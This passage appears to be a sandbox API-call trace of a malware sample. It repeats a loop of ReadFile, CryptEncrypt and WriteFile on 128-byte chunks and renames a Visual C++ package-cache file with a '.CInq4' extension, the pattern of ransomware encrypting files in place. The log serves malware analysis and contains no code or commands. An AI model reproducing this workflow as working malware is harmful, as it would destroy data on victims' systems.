dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.685] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.685] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.685] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.685] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.685] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.686] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.686] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.687] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.687] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.687] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.687] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.687] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.687] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.687] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.687] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.733] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.CInq4" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.cinq4")) returned 1 [0040.740] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0040.740] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0040.740] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.742] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.742] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.742] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.742] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.742] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.742] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.742] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.742] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.742] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.743] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.743] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.743] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.743] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, 